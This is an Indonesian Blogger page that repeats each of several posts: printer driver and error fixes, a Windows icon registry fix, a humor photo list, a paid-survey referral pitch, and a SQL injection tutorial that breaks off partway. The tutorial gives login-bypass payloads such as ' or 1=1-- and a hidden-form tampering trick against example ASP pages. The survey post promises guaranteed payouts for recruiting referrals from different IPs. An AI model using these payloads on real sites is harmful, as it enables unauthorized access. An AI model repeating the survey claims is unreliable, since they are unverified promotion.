63 characters With Spaces
Download Driver Canon PIXMA MP198/MP190 Series Free Download

Download Driver Canon PIXMA MP198/MP190 Series Free Download

Bagi  yang sedang cari Driver Canon Pixma MP198/MP190 Series Langsung sedot aja..
Driver Canon PIXMA MP198/MP190
Canon PIXMA MP198/MP190

Download Driver Canon PIXMA MP198/MP190 Series

Descriptions                    Version       SizeOS Download
PIXMA MP190 Driver    1.01            24.23 MBW7/Vista/XP           


Bagi  yang sedang cari Driver Canon Pixma MP198/MP190 Series Langsung sedot aja..
Driver Canon PIXMA MP198/MP190
Canon PIXMA MP198/MP190

Download Driver Canon PIXMA MP198/MP190 Series

Descriptions                    Version       SizeOS Download
PIXMA MP190 Driver    1.01            24.23 MBW7/Vista/XP           


Download Driver Canon PIXMA MP198/MP190 Series Free Download
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc9pHEqXGAo8Iu4lcvK-3xMVdmH_zeAn_D0IDR4RIIFqpOs54nhTwTqy5zUs08Y8xrdYaRee5lFbKH7orqLoWLfptM2nxnDDOMdIbNGDYHJrruzSgK-vLq3lIPP5Di6JUXL2v1BwttOlEQ/s72-c/Canon_mp198.jpg
View detail
A.W. $urveys Bisnis Online yang sudah terbukti mengapa tidak mencoba?

A.W. $urveys Bisnis Online yang sudah terbukti mengapa tidak mencoba?




Apa anda pernah dengar nama AW surveys?? mungkin bagi para blogger nama AW survey uda gak asing lagi ditelinga. AW surveys merupakan salah satu website terkemuka yang kerjanya melakukan survey terhadap website-website profesional, sebagai tolak ukur keberhasilan & sebagai alat promosi website mereka.


Banyak orang yang menganggap bahwa situs AW survey merupakan situs spam yang menipu membernya. Setelah saya mencoba bergabung menjadi member AWsurvey.com. Saya baru tahu apa yang selama ini dibicarakan orang2 pada umumnya.



Dengan berbagai pertimbangan, akhirnya saya mencoba menulis artikel tentang AWsurvey. Agar orang2 tidak menilai sesuatu dulu, sebelum dia tahu dan mencoba sendiri, dengan tetap menjalankan prosedur yang ditetapkan.



AWsurvey adalah website survey yg kerjanya mencari member agar member tersebut melakukan survey yg diajukan oleh admin AWsurvey. Survey nya cukup mudah,cukup simpel, bahkan jika orang yang kurang menguasai bahasa inggris pun, saya yakin teman2pasti bisa menjawab surveynya.



Dari mana AWsurveys mendapatkan uang? AWsurvey mendapatkan bayaran dari perusahaan/website yg mengajukan survey/penilaian terhadap member AWsurvey. Dan biasanya survey2 yg dilakukan di daerah amerika/eropa,biayanya sangat besar. Jadi sangat mustahil sekali, website sebesar AWsurvey mempertaruhkan kredibilitas demi uang $75 yang bagi orang indonesia nilai segitu sangat besar.



Gimana cara kita lakukan survey? caranya kita daftar jadi member di free acount alias gratis. Dan tugas kita cuma ngisi pertanyaan yang diajukan sama pihak AWsyrvey. Utk pendapatan yang kita peroleh antara $1 - 100 tiap kita melakukan survey. Dimana kemudian uang hasil kita mensurvey, akan dikirim pada rekening kita ( bisa via paypal ato check ) setelah uang yang kita peroleh minimal account nya diatas $75. ato dengan kata lain, jika dana penghasilan kita masih $75, maka dana itu belum bisa ditransfer pada kita.Nah, itulah yg sering orang salah arti & akhirnya menganggap AWsurvey adalah situs spam. Padahal sebenarnya bukan. Bukansaya membela situs tersebut, namun semua saya tulis berdasarkan kebenaran yang saya alami&saya tahu sendiri. Karena saya sudah mendapatkan uang dari survey yang saya lakukan.



Kenapa soal di AWsurvey jarang keluar??



Sebenarnya pertanyaan itu wajar. Pihak AWsurvey sendiri hanya melakukan survey dan pekerjaannya, jika ada pihak lain yang memberikan pekerjaan. Namun jika tidak ada yang memberikan jobs pada AWsurveys, maka pihak AWsurveys juga tidak akan memberikan soal survey berhadiah. Jadi sangat rasional sekali kan?? Dan biasanya pertanyaan survey akan keluar satu bulan sekali. Tapi bukan cuma itu aja, karena di dalam situs AWsurvey juga disediakan alamat2situs survey lainnya..



Pada dasarnya saat kita mendaftar pertama, uang yg kita peroleh dari hasil survey adalah $27..besar bukan??



Nah jika kita hanya diam&menunggu soal2 yg diajukan pihak AW survey bulan depan, maka uang tabungan kita di account AWsurvey akan semakin lama utk kita miliki.



Nah, bagaimana caranya agar kita bisa cepat mendapatkan dollar secepatnya??caranya mudah. Kita cukup mereferensikan teman2kita utk ikut di AWsurvey.kalo kita dapat satu teman kita langsung dapat $1,25.



Nah kalo dalam satu minggu kita dapat 45 temen yg ikut daftar gratis,asal dengan IP yg berbeda…maka bulan depan kita akan dikirim uang sejumblah $75…dan itu bukan omong kosong.



Kenapa??



Karena saya juga uda mendapatkannya 2 kali..



Jadi kenapa harus berpikir buruk??jika sebenarnya faktanya sangat bertolak belakang. Toh jika ditipu, kita gak pernah kehilangan uang sepeser pun..



Ingin gabung??



Coba aja, klik gambar AWsurveys dibawah ini atau  yang mana ajah  dech…dijamin gak ada ruginya.




A.W.Surveys - Get Paid to Review Websites!



Apa anda pernah dengar nama AW surveys?? mungkin bagi para blogger nama AW survey uda gak asing lagi ditelinga. AW surveys merupakan salah satu website terkemuka yang kerjanya melakukan survey terhadap website-website profesional, sebagai tolak ukur keberhasilan & sebagai alat promosi website mereka.


Banyak orang yang menganggap bahwa situs AW survey merupakan situs spam yang menipu membernya. Setelah saya mencoba bergabung menjadi member AWsurvey.com. Saya baru tahu apa yang selama ini dibicarakan orang2 pada umumnya.



Dengan berbagai pertimbangan, akhirnya saya mencoba menulis artikel tentang AWsurvey. Agar orang2 tidak menilai sesuatu dulu, sebelum dia tahu dan mencoba sendiri, dengan tetap menjalankan prosedur yang ditetapkan.



AWsurvey adalah website survey yg kerjanya mencari member agar member tersebut melakukan survey yg diajukan oleh admin AWsurvey. Survey nya cukup mudah,cukup simpel, bahkan jika orang yang kurang menguasai bahasa inggris pun, saya yakin teman2pasti bisa menjawab surveynya.



Dari mana AWsurveys mendapatkan uang? AWsurvey mendapatkan bayaran dari perusahaan/website yg mengajukan survey/penilaian terhadap member AWsurvey. Dan biasanya survey2 yg dilakukan di daerah amerika/eropa,biayanya sangat besar. Jadi sangat mustahil sekali, website sebesar AWsurvey mempertaruhkan kredibilitas demi uang $75 yang bagi orang indonesia nilai segitu sangat besar.



Gimana cara kita lakukan survey? caranya kita daftar jadi member di free acount alias gratis. Dan tugas kita cuma ngisi pertanyaan yang diajukan sama pihak AWsyrvey. Utk pendapatan yang kita peroleh antara $1 - 100 tiap kita melakukan survey. Dimana kemudian uang hasil kita mensurvey, akan dikirim pada rekening kita ( bisa via paypal ato check ) setelah uang yang kita peroleh minimal account nya diatas $75. ato dengan kata lain, jika dana penghasilan kita masih $75, maka dana itu belum bisa ditransfer pada kita.Nah, itulah yg sering orang salah arti & akhirnya menganggap AWsurvey adalah situs spam. Padahal sebenarnya bukan. Bukansaya membela situs tersebut, namun semua saya tulis berdasarkan kebenaran yang saya alami&saya tahu sendiri. Karena saya sudah mendapatkan uang dari survey yang saya lakukan.



Kenapa soal di AWsurvey jarang keluar??



Sebenarnya pertanyaan itu wajar. Pihak AWsurvey sendiri hanya melakukan survey dan pekerjaannya, jika ada pihak lain yang memberikan pekerjaan. Namun jika tidak ada yang memberikan jobs pada AWsurveys, maka pihak AWsurveys juga tidak akan memberikan soal survey berhadiah. Jadi sangat rasional sekali kan?? Dan biasanya pertanyaan survey akan keluar satu bulan sekali. Tapi bukan cuma itu aja, karena di dalam situs AWsurvey juga disediakan alamat2situs survey lainnya..



Pada dasarnya saat kita mendaftar pertama, uang yg kita peroleh dari hasil survey adalah $27..besar bukan??



Nah jika kita hanya diam&menunggu soal2 yg diajukan pihak AW survey bulan depan, maka uang tabungan kita di account AWsurvey akan semakin lama utk kita miliki.



Nah, bagaimana caranya agar kita bisa cepat mendapatkan dollar secepatnya??caranya mudah. Kita cukup mereferensikan teman2kita utk ikut di AWsurvey.kalo kita dapat satu teman kita langsung dapat $1,25.



Nah kalo dalam satu minggu kita dapat 45 temen yg ikut daftar gratis,asal dengan IP yg berbeda…maka bulan depan kita akan dikirim uang sejumblah $75…dan itu bukan omong kosong.



Kenapa??



Karena saya juga uda mendapatkannya 2 kali..



Jadi kenapa harus berpikir buruk??jika sebenarnya faktanya sangat bertolak belakang. Toh jika ditipu, kita gak pernah kehilangan uang sepeser pun..



Ingin gabung??



Coba aja, klik gambar AWsurveys dibawah ini atau  yang mana ajah  dech…dijamin gak ada ruginya.




A.W.Surveys - Get Paid to Review Websites!
A.W. $urveys Bisnis Online yang sudah terbukti mengapa tidak mencoba?
View detail
Memperbaiki Semua Icon Program dan Shortcut berubah menjadi satu Icon

Memperbaiki Semua Icon Program dan Shortcut berubah menjadi satu Icon


Saya pernah mengalami kasus bahkan  berulang ulang kasusSemua Icon, shortcut, dan default program berubah. Kronologinya berbeda beda ada yang mendownload file dan membukanya dengan open with aplikasi (pake klik kanan) trus di daftar program pembuka nya beliau milih Codec Pack Media Player. Akibatnya, semua aplikasi (.exe dan teman-temannya) gak bisa diexekusi karena alplikasi pembukanya udah berubah. Shortcut di dekstop juga udah berubah. 

Awalnya empunya laptop menyangka terkena virus, tapi diagnosa cepat antivirus bahkan scan dengan antivirus yang update tidak menemukan gejala terinfeksi virus. Mulai tuh utak-atik ngerubah properties, shortcut secara manual dan satu-satu, masih nihil. Sampai ngutak-ngatik registry windowsnya…..masih gak ketemu.

Karena penasaran mulailah nanya si mbah google. Hasil baca sana-sini ternyata nemuin beberapa trik, dan salah satunya ane tulis disini dengan judul Cara Jitu Memperbaiki Icon program dan shortcut berubah.
Solusi masalah diatas adalah dengan menginjeksi registry windows 7 dengan dua file ini.
1.    Download default_exe.reg dan default_lnk.reg disini
2.    Klik dua kali file registry tersebut.
3.    Muncul peringatan, ketik “yes”
4.    Restart

Dan ternyata cara jitu ini bekerja dengan baik padahal si pemilik laptop sudah ingin menginstal ulang laptoop kesayangannya itu.sekarang pada tahukan
Semoga bermanfaat.

Saya pernah mengalami kasus bahkan  berulang ulang kasusSemua Icon, shortcut, dan default program berubah. Kronologinya berbeda beda ada yang mendownload file dan membukanya dengan open with aplikasi (pake klik kanan) trus di daftar program pembuka nya beliau milih Codec Pack Media Player. Akibatnya, semua aplikasi (.exe dan teman-temannya) gak bisa diexekusi karena alplikasi pembukanya udah berubah. Shortcut di dekstop juga udah berubah. 

Awalnya empunya laptop menyangka terkena virus, tapi diagnosa cepat antivirus bahkan scan dengan antivirus yang update tidak menemukan gejala terinfeksi virus. Mulai tuh utak-atik ngerubah properties, shortcut secara manual dan satu-satu, masih nihil. Sampai ngutak-ngatik registry windowsnya…..masih gak ketemu.

Karena penasaran mulailah nanya si mbah google. Hasil baca sana-sini ternyata nemuin beberapa trik, dan salah satunya ane tulis disini dengan judul Cara Jitu Memperbaiki Icon program dan shortcut berubah.
Solusi masalah diatas adalah dengan menginjeksi registry windows 7 dengan dua file ini.
1.    Download default_exe.reg dan default_lnk.reg disini
2.    Klik dua kali file registry tersebut.
3.    Muncul peringatan, ketik “yes”
4.    Restart

Dan ternyata cara jitu ini bekerja dengan baik padahal si pemilik laptop sudah ingin menginstal ulang laptoop kesayangannya itu.sekarang pada tahukan
Semoga bermanfaat.
Memperbaiki Semua Icon Program dan Shortcut berubah menjadi satu Icon
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimsumzDJUyP4iNpYPN0gTVVPKmurQakEiOZT1gn4ZzkC8WSNDD59UQwvjx57C4jvM3Axd0X0eSFZAXnwOasd7Iw6ZxezB5S6Gzj-_PKuRiY9gh0ZqKFDS2kxfAUmRSyBKs_yegcrILvEo/s72-c/Ikon+Desktop+Jadi+Sama.png
View detail
Cara mengatasi Printer canon MP258 Error E08

Cara mengatasi Printer canon MP258 Error E08

Printer canon MP258 yang error kode pada LCDnya E08 itu? Sebelumnya saya sudah pernah dan banyak sekali membahas tentang masalah printer canon, tetapi setelah saya searching di arsip blog saya saya belum pernah membahas masalah error E08 satu ini. Baiklah tanpa basa basi lagi yuk kita perbaiki printernya.


APAKAH PENYEBAB E08 Itu??


E08 adalah error yang disebabkan limit print dari head sudah mencapai 2000lembar, dan solusinya printer harus minta di reset kembali agar sistem counter di ICnya kembali ke nilai 0 lagi.

BAGAIMANA CARA MEMPERBAIKINYA??

Berikut langkah langkah cara memperbaikinya,


  1. Printer Harus dalam keadaan mati dan kabel listrik terpasang.
  2. Kemudian Tekan Tombol STOP/RESET dan tahan, kemudian tekan tombol POWER dan tahan. (Harus Urut dan keduanya ditekan jangan dilepas)
  3. Tombol POWER masih ditekan, lepas tombol STOP/RESET, kemudian tekan tombolSTOP/RESET 2 x dalam keadaan tombol power masih ditekan. (Ingat tombol power harus ditekan terus, dan tombol Stop/reset ditekan dua kali gak lebih gak kurang, JANGAN SALAH)
  4. Lepas kedua tombol secara bersamaan. (Tombol power dan stop/reset dilepas bersamaan)
  5. Printer akan berproses beberapa saat (agak lama), kemudian LCD Panel akan menunjukkan angka NOL (0)
  6. Pada Komputer akan mendeteksi DEVICE BARU, Abaikan saja …..
  7. Keadaan ini menunjukkan printer MP258 dalam keadaan SERVICE MODE dan siap direset.
  8. Download software Reserter MP258 DISINI.
  9. Exctract File Resetter MP258 tersebut.
  10. Siapkan 2 kertas di printer (ini untuk print pada waktu proses reset)
  11. Jalankan program Resetter MP258.
  12. Klik “MAIN”, maka printer akan berproses, kemudian MP258 akan print satu halaman dengan tulisan ” D=000.0 “
  13. Klik ” EEPROM Clear “.
  14. Kemudian klik ” EEPROM “, dan printer akan print hasil Resetter MP258. Salah satu barisnya adalah sebagai berikut : “TPAGE(TTL=00000 COPY=00000)”
  15. Matikan Printer dengan menekan tombol POWER.
  16. Selesai Printer siap digunakan lagi 



Tambahan:

Apabila pada saat membuka software resetter error nampak seperti ini:


Itu berarti printernya belum masuk dalam service mode. untuk masuk ke dalam service mode perhatikan langkah-langkah diatas sekali lagi.
Printer canon MP258 yang error kode pada LCDnya E08 itu? Sebelumnya saya sudah pernah dan banyak sekali membahas tentang masalah printer canon, tetapi setelah saya searching di arsip blog saya saya belum pernah membahas masalah error E08 satu ini. Baiklah tanpa basa basi lagi yuk kita perbaiki printernya.


APAKAH PENYEBAB E08 Itu??


E08 adalah error yang disebabkan limit print dari head sudah mencapai 2000lembar, dan solusinya printer harus minta di reset kembali agar sistem counter di ICnya kembali ke nilai 0 lagi.

BAGAIMANA CARA MEMPERBAIKINYA??

Berikut langkah langkah cara memperbaikinya,


  1. Printer Harus dalam keadaan mati dan kabel listrik terpasang.
  2. Kemudian Tekan Tombol STOP/RESET dan tahan, kemudian tekan tombol POWER dan tahan. (Harus Urut dan keduanya ditekan jangan dilepas)
  3. Tombol POWER masih ditekan, lepas tombol STOP/RESET, kemudian tekan tombolSTOP/RESET 2 x dalam keadaan tombol power masih ditekan. (Ingat tombol power harus ditekan terus, dan tombol Stop/reset ditekan dua kali gak lebih gak kurang, JANGAN SALAH)
  4. Lepas kedua tombol secara bersamaan. (Tombol power dan stop/reset dilepas bersamaan)
  5. Printer akan berproses beberapa saat (agak lama), kemudian LCD Panel akan menunjukkan angka NOL (0)
  6. Pada Komputer akan mendeteksi DEVICE BARU, Abaikan saja …..
  7. Keadaan ini menunjukkan printer MP258 dalam keadaan SERVICE MODE dan siap direset.
  8. Download software Reserter MP258 DISINI.
  9. Exctract File Resetter MP258 tersebut.
  10. Siapkan 2 kertas di printer (ini untuk print pada waktu proses reset)
  11. Jalankan program Resetter MP258.
  12. Klik “MAIN”, maka printer akan berproses, kemudian MP258 akan print satu halaman dengan tulisan ” D=000.0 “
  13. Klik ” EEPROM Clear “.
  14. Kemudian klik ” EEPROM “, dan printer akan print hasil Resetter MP258. Salah satu barisnya adalah sebagai berikut : “TPAGE(TTL=00000 COPY=00000)”
  15. Matikan Printer dengan menekan tombol POWER.
  16. Selesai Printer siap digunakan lagi 



Tambahan:

Apabila pada saat membuka software resetter error nampak seperti ini:


Itu berarti printernya belum masuk dalam service mode. untuk masuk ke dalam service mode perhatikan langkah-langkah diatas sekali lagi.
Cara mengatasi Printer canon MP258 Error E08
View detail
Cara mengatasi Canon IP2700 Error 5100 Lengkap

Cara mengatasi Canon IP2700 Error 5100 Lengkap

Share otak - Membahasa sedikit tentang printer canon  IP2700 series yang bandel dan juga murah, maka tidak sedikit orang yang  lebih  memilih printer yang  lumayan bandel ini, juga errornya pun sangat mudah dianalisis dengan baik. namun ternyata masih banyak orang yang sedikit error pada printernya harus repot ke tukang service. maka Admin akan membahas tentang error yang biasa terjadi pada printer canon IP2700. 



Gambar diatas adalah contoh error yang biasa terjadi pada printer canon. mari selidiki .

5000 ...................Home position error
5100 ...................Carriage control error
5200 ...................Head temperature sensor error
5400 ...................Printer temperature sensor error
5600 ...................No cartridge error
5C00 ...................Purging operation error
5200 ...................Scanner cartridge error

Berdasarkan kode diatas maka kita patut curiga keselang infusnya. Maka tutup printer. rata - rata kasus seperti itu itu selang infus  terjepit dan Catrige Printer Canon IP2770 tidak dapat bergerak bebas. Jadi muncul Error 5100.




Solusinya tentulah merapikan selang infus, biar catrige Canon IP2770 bergerak dengan bebas, 

sekian toturial tentang  error canon IP2700 maaf bila ada salah - salah  kata karena Admin sedang  belajar  menjadi  penulis profesional, mudah - mudahan aja kaya tatang suhendra... jahahhahahhahaha
Share otak - Membahasa sedikit tentang printer canon  IP2700 series yang bandel dan juga murah, maka tidak sedikit orang yang  lebih  memilih printer yang  lumayan bandel ini, juga errornya pun sangat mudah dianalisis dengan baik. namun ternyata masih banyak orang yang sedikit error pada printernya harus repot ke tukang service. maka Admin akan membahas tentang error yang biasa terjadi pada printer canon IP2700. 



Gambar diatas adalah contoh error yang biasa terjadi pada printer canon. mari selidiki .

5000 ...................Home position error
5100 ...................Carriage control error
5200 ...................Head temperature sensor error
5400 ...................Printer temperature sensor error
5600 ...................No cartridge error
5C00 ...................Purging operation error
5200 ...................Scanner cartridge error

Berdasarkan kode diatas maka kita patut curiga keselang infusnya. Maka tutup printer. rata - rata kasus seperti itu itu selang infus  terjepit dan Catrige Printer Canon IP2770 tidak dapat bergerak bebas. Jadi muncul Error 5100.




Solusinya tentulah merapikan selang infus, biar catrige Canon IP2770 bergerak dengan bebas, 

sekian toturial tentang  error canon IP2700 maaf bila ada salah - salah  kata karena Admin sedang  belajar  menjadi  penulis profesional, mudah - mudahan aja kaya tatang suhendra... jahahhahahhahaha
Cara mengatasi Canon IP2700 Error 5100 Lengkap
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixtRINU4wPVscP5-r-bs26qaepl8KrJ-PCyC6I1znoIWs1ffYBI-W4YoqdQN2rvqWxW6cyhQzsnN68Rw-Xh8NWByymWv8hDYcxtygfoMHm74j9GoTq25BxAV8u6aXMINJeeFOYDxBaxSk/s72-c/error+5100.JPG
View detail
Potret Humor Indonesia : Selera Humor yang sudah membudaya

Potret Humor Indonesia : Selera Humor yang sudah membudaya

Assalamau'alaikum, sedikit mengelitik memang Negeri kita ini dengan bermacam -macam suku bangsa Indonesia melahirkan sebuah Kehumoran - kehumooran tersendiri, bagaimana tidak memang tidak ada salahnya ada Film layar tancep...emm maksud saya layar lebar yang berjudul "alangkah lucunya negeri ini" , memang benar kok, kalo memang anda tidak percaya monggo di renungkan gambar  - gambar di bawah ini :


Hanya di Indonesia ada kasus seperti ini, 



Hanya di Indonesia si Mc Erot



Hanya di Indonesia ada yg jual ES PANAS

Hanya di Indonesia ada peringatan kyk gini (sbnrnya “Gunakan Listrik seperlunya” tapi ada yg jail hapus hurufnya) 


Hanya di Indonesia kotak suratnya kaya gini,


Hanya di Indonesia anak majikan dianggap sebagai herder,


Hanya di Indonesia ada Pecel Lele pake listrik,


Hanya di Indonesia yang ngejalanin “aturan untuk dilanggar”


Hanya di Indonesia ada larangan merokok seperti ini,


Hanya di Indonesia yg memadukan IT dengan cara Tradisional,


Hanya di Indonesia supirnya ada yg bekas penulis puisi,


Hanya di Indonesia binatang malu difoto ama manusia,



Hanya di Indonesia ada ancaman kyk gini,



Hanya di Indonesia ada Bis Kota yg bisa dimakan,



Hanya di Indonesia orang bisa jadi Polisi n jadi Tukang Becak dalam waktu yg bersamaan,



Hanya di Indonesia ada anjing yang berani gigit ketua RT, dimumkan pula. 



Hanya di Indonesia ada yg jual Lemon Tea bentuknya kyk gitu. Bentar2, dimana tea-nya??


Hanya di Indonesia ada Asbak terbesar sejagat raya


Hanya di Indonesia terjadi Pedamaman



Hanya di Indonesia kita bisa nabung sembari makan bakso

Hanya di Indonesia yang punya merek mobil seperti ini

Hanya di Indonesia yang punya nama tempat seperti ini

Hanya di Indonesia ada yang bisa menyaingi KFC (Kentucky Fried Chicken)



Hanya di Indonesia ada minuman berdosa



Hanya di Indonesia ada yg jual menu minuman kyk gini



Hanya di Indonesia ad kasus konyol seperti ini





Hanya di Indonesia ada cabang Starbucks Coffee buat kalangan bawah



Hanya di Indonesia ada yg jual Switter


Hanya di Indonesia yang pake peringatan meyakinkan pembelinya kyk gini


Hanya di Indonesia Nokia mendistribusikan produk sendalnya



Hanya di Indonesia motornya bisa dinaekin lebih dari 5 orang


Hanya di Indonesia yang mempuyai kembaran Presiden US


Hanya di Indonesia dimana Kasih sayang seorang Ibu bisa kalah dengan kasih sayang seorang Pembantu



Hanya di Indonesia ada orang yg curhat saat banjir



Hanya di Indonesia ada marka jalan sesat kyk gn



Hanya di Indonesia mahasiswa bisa ngambil jurusan Tambel Ban



Hanya di Indonesia ada peringatan untuk mengedarkan Narkoba (melarang untuk tidak mengedarkan = harus mengedarkan?? )



Hanya di Indonesia orang sampe harus dilarang untuk tidur di bawah mobil



Okeh, sekian dulu photo - photo yang saya ambil dari beberapa referensi dan tidak saya sebutkan satu persatu, karena taku disangka saya ngabesen..
Sekian semoga bermanfaat dan bisa menjadi insfirasi untuk melanjutkan perjuangan mereka.... hehehehe :P
Assalamau'alaikum, sedikit mengelitik memang Negeri kita ini dengan bermacam -macam suku bangsa Indonesia melahirkan sebuah Kehumoran - kehumooran tersendiri, bagaimana tidak memang tidak ada salahnya ada Film layar tancep...emm maksud saya layar lebar yang berjudul "alangkah lucunya negeri ini" , memang benar kok, kalo memang anda tidak percaya monggo di renungkan gambar  - gambar di bawah ini :


Hanya di Indonesia ada kasus seperti ini, 



Hanya di Indonesia si Mc Erot



Hanya di Indonesia ada yg jual ES PANAS

Hanya di Indonesia ada peringatan kyk gini (sbnrnya “Gunakan Listrik seperlunya” tapi ada yg jail hapus hurufnya) 


Hanya di Indonesia kotak suratnya kaya gini,


Hanya di Indonesia anak majikan dianggap sebagai herder,


Hanya di Indonesia ada Pecel Lele pake listrik,


Hanya di Indonesia yang ngejalanin “aturan untuk dilanggar”


Hanya di Indonesia ada larangan merokok seperti ini,


Hanya di Indonesia yg memadukan IT dengan cara Tradisional,


Hanya di Indonesia supirnya ada yg bekas penulis puisi,


Hanya di Indonesia binatang malu difoto ama manusia,



Hanya di Indonesia ada ancaman kyk gini,



Hanya di Indonesia ada Bis Kota yg bisa dimakan,



Hanya di Indonesia orang bisa jadi Polisi n jadi Tukang Becak dalam waktu yg bersamaan,



Hanya di Indonesia ada anjing yang berani gigit ketua RT, dimumkan pula. 



Hanya di Indonesia ada yg jual Lemon Tea bentuknya kyk gitu. Bentar2, dimana tea-nya??


Hanya di Indonesia ada Asbak terbesar sejagat raya


Hanya di Indonesia terjadi Pedamaman



Hanya di Indonesia kita bisa nabung sembari makan bakso

Hanya di Indonesia yang punya merek mobil seperti ini

Hanya di Indonesia yang punya nama tempat seperti ini

Hanya di Indonesia ada yang bisa menyaingi KFC (Kentucky Fried Chicken)



Hanya di Indonesia ada minuman berdosa



Hanya di Indonesia ada yg jual menu minuman kyk gini



Hanya di Indonesia ad kasus konyol seperti ini





Hanya di Indonesia ada cabang Starbucks Coffee buat kalangan bawah



Hanya di Indonesia ada yg jual Switter


Hanya di Indonesia yang pake peringatan meyakinkan pembelinya kyk gini


Hanya di Indonesia Nokia mendistribusikan produk sendalnya



Hanya di Indonesia motornya bisa dinaekin lebih dari 5 orang


Hanya di Indonesia yang mempuyai kembaran Presiden US


Hanya di Indonesia dimana Kasih sayang seorang Ibu bisa kalah dengan kasih sayang seorang Pembantu



Hanya di Indonesia ada orang yg curhat saat banjir



Hanya di Indonesia ada marka jalan sesat kyk gn



Hanya di Indonesia mahasiswa bisa ngambil jurusan Tambel Ban



Hanya di Indonesia ada peringatan untuk mengedarkan Narkoba (melarang untuk tidak mengedarkan = harus mengedarkan?? )



Hanya di Indonesia orang sampe harus dilarang untuk tidur di bawah mobil



Okeh, sekian dulu photo - photo yang saya ambil dari beberapa referensi dan tidak saya sebutkan satu persatu, karena taku disangka saya ngabesen..
Sekian semoga bermanfaat dan bisa menjadi insfirasi untuk melanjutkan perjuangan mereka.... hehehehe :P
Potret Humor Indonesia : Selera Humor yang sudah membudaya
View detail
Tutorial SQL Injection Lengkap

Tutorial SQL Injection Lengkap

Assalamu'allaikum,, udah  lama tidak posting bahkan kontrol pun tidak, sekarang saya akan membagian sebuah  artikel yang  sangat menarik di dunia hacking, menurut  saya memang dunia  hacking harus  banyak memutar otak dan  juga melatih  kesabaran, selain untuk pembelajaran bisa  juga untuk kita menjadi  sebuah metode untuk menjaga laman web kita agar tidak gampang di  Hack. oke dari pada basa - basi kita jelaskan dulu sedikit.

Ketika mesin server hanya port 80 yang dibuka, kita mempunyai keyakinan bahwa tidak akan menghasilkan sesuatu yang bermanfaat yang dapat digunakan untuk menyerang, admin juga beranggapan hanya degan mem-patch servernya dianggap aman. Jika anggapan itu terus dipakai berarti kita “menekan tombol” untuk membuka hacker masuk.
SQL Injection adalah salah satu tipe meng-hack yang hanya membutuhkan port 80 dan tidak memerlukan port lain. SQL injection akan menyerang aplikasi web yang berbasiskan side-server scripting seperti ASP, JSP, PHP, CGI, dan yang mirip dengan itu. Pada artikel ini kita tidak akan membahas hal yang paling baru tentang SQL Injection, karena motode dan trik SQL Injection terus berkembang.
Sebelum anda membaca lebih lanjut, anda harus mnegetahui terlebih dahulu bagaimana database bekerja dan bagaimana SQL digunakan untuk mengaksesnya.Kata Kunci: Web Site, SQL, SQL Injection

SQL Injection adalah sebuah teknik untuk mengeksporasi aplikasi web dengan memanfaatkan suplai data dari client dalam sintak SQL. Banyak halaman web memakai parameter dari web user untuk menggunakan query ke dalam database.
Kita ambil sebagai contoh ketika user akan login, halaman user akan mengirim user dan login sebagai parameter untuk digunakan sebagai SQL dan mencek apakah usedan password cocok. Dengan SQL Injection ini sangat mungkin untuk kita mengirim user nama dan password dan dianggap benar.
Walaupun mudah untuk menandai dan melindungi model serangan ini, tapi cukup mengherankan banyak aplikasi web yang terserang dengan metode ini. Pada pembahasan selanjutnya dicontohkan ketika memakai web server IIS dan Microsoft SQL Server untuk databasenya, sedangkan skrip yang dipakai adalah ASP.

Untuk keperluan SQL Injection kita hanya membutuhkan browser. Browser yang
dipakai adalah segala macam browser.

Kita dapat memanfaatkan halaman-halaman web yang terdapat submit data, contoh: halaman login, pencarian, feedback, dan lain-lain. Kadang halaman HTML menggunakan metode POST untuk mengirim parameter ke halaman web yang lain.

Jika model halamnnya seperti ini maka kita harus melihat source code karena kita tidak dapat melihat pada URL. Mudah untuk mencek source code halaman HTML, tinggal klik kanan pilih view source (pada Internet Exlorer), kemudian cari kode :

“FORM”. Berikut contoh halaman tersebut:
<FORM action=search.asp method=post>
<input type=hidden name=login value=andi>
</FORM>
Semua yang terletak diantara <FORM> dan </FORM> mempunyai potensial untuk digunakan mengekplorasi halaman web tersebut. Karena itu dapat menjadi sebuah parameter. Halaman diatas berarti akan mengrimkan parameter bernama “login”
dengan nilai (value)=”andi”.

Jika halaman bukan berbentuk form input, maka anda harus cari halaman yang di
buat dengan bahasa pemrograman internet seperti ASP, JSP, CGI or PHP, kemudian
cari spesial URL seperti http://www.myandisun.com/profile.asp?id=10. Ini berarti
halaman web ASP dengan parameter “id” yang bernilai “10”.

Bagaimana cara mengetes suatu halaman web mudah diserang?
Dimulai dari pengunaan single quote. Seperti masukan:
hi or 1=1--
Dalam login, password, atau URL lain.
Contoh:

- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://www.myandisun.com/profil.asp?id=10id=hi' or 1=1--
Jika halaman dalam bentuk ada field yang bertipe hidden, anda tinggal download
kode HTML dari situs yang anda buka ke hard disk anda, di modifikasi sedikit
kemudian di simpan dalam hard disk dan modifikasi URL, seperi contoh berikut:
Skrip awal:
<FORM action=search.asp method=post>
<input type=hidden name=cari value=t610 >
</FORM>
Setelah di modifikasi:
<FORM action=http://www.myandisun.com/search.asp method=post>
<input type=hidden name=cari value=t610>
</FORM>

Jika anda beruntung maka dengan cara seperti itu anda dapat masuk ke halaman web tanpa harus mengisikan login name dan password yang benar.
Kenapa Harus ‘ or 1=1--
Kita akan ekplorasi pentingnya 1=1 -- dan apakah memperoleh informasi yang tidak normal (diberikan kepada user biasa) dari sebuah web site. Kita ambil halaman asp yang di link ke halaman lain seperti URL berikut:
http://www.myandisun.com/barang.asp?category=food
Dalam URL diatas, “category” adalah nama variabel sedangkan “food” adalah nilai yang diberikan pada variabel tersebut. Untuk dapat mengambil nilai dari variabel diatas berikut code program pada file barang.asp.
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
seperti kita lihat pada contoh diatas variabel kita bungkus dan diberi nama “v_cat”
dan SQL menjadi:
SELECT * FROM product WHERE PCategory='food'
Pada query diatas menghasilkan ini satu atau beberapa baris yang cocok untuk
kondisi dimana (WHERE) kondisinya adalah ‘food’.
Sekarang kita asumsikan URL diatas kita ganti menjadi seperti ini:
http://www.myandisun.com/barang.asp?category=food' or 1=1--
Sekarang variabel “v_cat” kita menjadi “foot’ or 1=1—“, jika masukkan ke query maka:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
